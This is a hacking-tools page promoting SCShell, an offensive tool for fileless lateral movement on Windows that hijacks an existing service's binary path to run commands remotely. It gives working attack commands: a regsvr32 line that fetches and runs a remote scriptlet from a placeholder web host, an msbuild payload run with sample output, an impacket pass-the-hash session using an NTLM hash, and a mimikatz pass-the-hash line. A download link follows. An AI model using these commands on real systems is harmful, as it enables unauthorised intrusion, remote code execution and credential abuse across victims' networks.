<div style="margin:20px 0 0 200px"> To view the site, enable JavaScript by changing your browser options, then <a href="">Try Again</a>.</div>

SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA to Run Command

06 Dec, 2019
SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA to Run Command

SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.

The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute).

How it works?

Instead of creating a service it simply remotely open a service and modify the binary path name via the ChangeServiceConfigA API. Then it starts the service.

Once the execution is completed the service binary path is reverted to the original one. The original service path is extracted using QueryServiceConfigA. Everything is happening over DCERPC including the authentication.

Usage

The current build is written in C but I will port it to C# and PowerShell.

Usage:

SCShell.exe target service payload domain username password

target can be set to local to run the payload locally

Remote execution:

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll". administrastor Password

I recommend using C:\windows\system32\cmd.exe /c to make sure to payload will not be killed once the service stop. You NEED to use the full path.

You can also use a msbuild payload.

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password
SCShell ***
Trying to connect to 192.168.197.131
Username was provided attempting to call LogonUserA
SC_HANDLE Manager 0x009ED250
Opening XblAuthManager
SC_HANDLE Service 0x009ED1B0
Service path was changed to C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
Service was started.

I'm using the XblAuthManager as the target which is the Xbox Accessory Management Service.

Passing the Hash

scshell.py is a python 2 & 3 implementation of SCShell. Using impacket project it can easily be used to perform the same lateral movement using pass the hash.

Installation

pip install impacket

Usage

python scshell.py DOMAIN/[email protected] -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

You can use the C utility to pass the hash. By default the current process token will be used. You can set the current process token using standard pass the hash approach.

On the local system

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

Then run the SCShell.exe within the newly created cmd.exe.

Download Tool: https://github.com/Mr-Un1k0d3r/SCShell

Other Hacking Tools

Explore All Hacking Tools »

Exclusive Blog

Read All Exclusive Blog »
Android Banking Trojan targets over 232 banking apps, including Indian banks
Cyber Criminals are turning into Cryptominers, Dominating Cyber Threat Landscape

According to Check Point, during the period July to December 2017, one in five Organizations are affected by crypto mining malware, tools that enable cybercriminals to hijack the victim's CPU or GPU power and existing resources to mine cryptocurrency, using as much as 65% of the end-users CPU power.

Read Details

Breaking News

Breaking News Of Each Month »
85 password stealing apps found on Google Playstore
85 password stealing apps found on Google Playstore

Security researchers discovered malicious apps designed to steal credentials from users have been downloaded million times from Google play store. Among these, the most popular app is a gaming app.

Read Details